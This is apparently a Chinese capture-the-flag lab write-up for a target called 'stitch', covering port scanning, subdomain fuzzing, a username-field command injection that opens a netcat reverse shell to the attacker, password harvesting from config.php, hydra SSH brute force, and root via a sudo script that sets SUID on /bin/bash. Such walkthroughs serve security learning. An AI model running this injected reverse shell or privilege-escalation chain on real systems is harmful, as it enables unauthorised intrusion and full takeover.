当前位置: 首页 > news >正文

stitch靶场学习笔记

正文1、端口扫描2、域名重定向3、NC反弹4、文件查找5、iiiii用户登录6、/HOME下多用户筛选7、多用户爆破8、iot_runner程序漏洞利用正文kali攻击机地址192.168.1.4靶场地址192.168.1.191、端口扫描在kali里使用nmap工具nmap-sV-v-T4-A192.168.1.1922和80端口是开放的。进入网页发现域名stitch.dsz2、域名重定向修改kali中hosts:vi/etc/hosts进入hosts文件里添加192.168.1.19 stitch.dsz:wq!退出重新访问http://stitch.dsz发现域名重定向了使用子域名扫描工具wfuzz-w/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt-ustitch.dsz-HHost:FUZZ.stitch.dsz--hw1348扫出来3个子域名http://mail.stitch.dsz、http://dog.stitch.dsz、http://iot.stitch.dsz:重新编辑kali里面的/etc/hosts文件192.168.1.19 stitch.dsz dog.stitch.dsz mail.stitch.dsz iot.Stitch.dsz顺便修改windows下的Hosts文件C:\Windows\System32\drivers\etc\hosts3、NC反弹登录http://iot.stitch.dsz/,爆破用户名和密码的时候可以对用户名构造nc连接语句;busyboxnc192.168.1.44444-e/bin/bash;调整格式/usr/bin/script-qc/bin/bash /dev/null CTRLZ stty raw -echo;fgreset xtermcd..find./4、文件查找在/www目录下有个./dog/config.php文件可以发现里面存了一堆密码3c4900896d92da 3c4900896d92da789abc s3cur3Pssw0rd5、iiiii用户登录先拿iiiii:3c4900896d92da对应的用户名、密码远程访问iiiii用户su- iiiii6、/HOME下多用户筛选筛选/home目录下的所有用户#写法1ls-al|awk{print $NF}#写法2输出结果跳过前三行ls-al|awk NR3 {print $NF}7、多用户爆破hydra-Lusr.txt-Ppass1.txt ssh://192.168.1.19-I-enrs切换iotuser用户后发现可以执行iot_runner的脚本8、iot_runner程序漏洞利用在iotuser用户下操作cd/tmpvia.sh IOT#chmods /bin/bashchmod600/tmp/a.sh在iiiii用户下操作sudo/usr/bin/push_iot /tmp/a.sh在iotuser用户下操作sudo/usr/bin/iot_runner a.shbash-p大致意思解释 (1在iotuser下创建恶意脚本cd/tmp# 进入临时目录所有人可写via.sh# 创建脚本 a.sh脚本内容最关键chmod s /bin/bashchmod s给文件设置SUID 权限/bin/bash系统的 bash 命令行工具效果让/bin/bash变成任何人运行都直接获得 root 权限2设置脚本权限chmod600/tmp/a.sh让脚本只能被iotuser读写避免被其他用户修改或删除(3在iiiii用户下把脚本推给 iot_runnersudo/usr/bin/push_iot /tmp/a.sh作用将/tmp/a.sh放到iot_runner可以执行的位置让后面的iot_runner能找到并运行它 4回到iotuser以 root 权限执行恶意脚本sudo/usr/bin/iot_runner a.shiot_runner是root 权限运行它执行了你的a.sha.sh执行chmods /bin/bash结果/bin/bash 获得了 SUID root 权限5最终拿到 root 权限bash-p-p是什么保留SUID 权限不降级权限直接以root身份打开 shell执行完这一句你就已经从普通用户 → 变成 root了
http://www.gsyq.cn/news/1334747.html

相关文章:

  • 在 Eclipse 中使用 Tabnine
  • 【限时解密】Perplexity写作辅助底层架构图首次公开:基于逆向分析的7大能力边界与替代方案评估
  • Vivado仿真卡在图像数据验证?手把手教你用$readmemh和$fwrite搭建完整数据流
  • 蜂窝板幕墙技术全解析:四川铝单板/四川铝方管/四川铝方通/型材铝方通/外墙格栅铝方管/外墙蜂窝板/选材 - 优质品牌商家
  • Kali Linux 基础命令汇总 新手入门必备
  • 收藏!Kali Linux 超全基础命令大全
  • 自动化测试的新趋势:AI驱动的自动化测试框架
  • postman重置密码收不到邮件
  • 保姆级教程:用ENVI 5.3搞定Landsat8影像的辐射与大气校正(附海淀区裁剪实例)
  • Linux内核platform_device深度解析:从设备模型到sysfs实战
  • 数据统计模块
  • 谷歌开发者大会发布多项AI更新:Gemini升级、搜索改版,加速AI生态商业化
  • 不止于对话:将本地ChatGLM-6B接入Unity游戏,打造你的专属AI NPC
  • okbiye 实测|毕业答辩 PPT “一键通关”?我用这个 AI 工具省下了三天熬夜时间
  • 深度解析msvcr120.dll丢失诱因:误删、病毒、运行库损坏逐一排查修复
  • 收藏备用!Kali Linux 零基础超详细教程(最新版),从下载到使用一篇够
  • 终极指南:在Windows上使用iperf3进行专业网络性能测试
  • 8351健康管理中心用黑科技设备为企业家筑起生命防线
  • 负载锌酞菁(ZnPc)/α-萘酚温敏水凝胶,ZnPc/α-Naphthol
  • AI从业者的简历优化:如何突出AI项目经验
  • Marshall 推出新款头戴式耳机 Milton ANC:音质续航兼得,售价 229 美元!
  • VLA算法工程师面试题(七)
  • SolidWorks 服务器资源不够 10 人用?云飞云智能分配云桌面,一人一桌面不打架
  • 中华民族站起来了-《AI驱动上下五千年:从结绳记事到智能纪元》-九品中正制——一个失败的“人才推荐算法“
  • 菩瓦纽课业平台:精准追踪错题根源,让每一份努力都有回响
  • 算法(移动零)
  • 聚类 vs 分类:AI 世界的社恐与社牛
  • 2026年Q2四川地区干式真空泵权威厂家排行盘点 - 优质品牌商家
  • 当你的游戏PC变成云服务器:Sunshine如何重新定义游戏串流体验
  • 2026年q2四川证件挂失服务平台排行实测:四川挂失登报/四川挂失登报声明/四川挂失补办登报/优选指南 - 优质品牌商家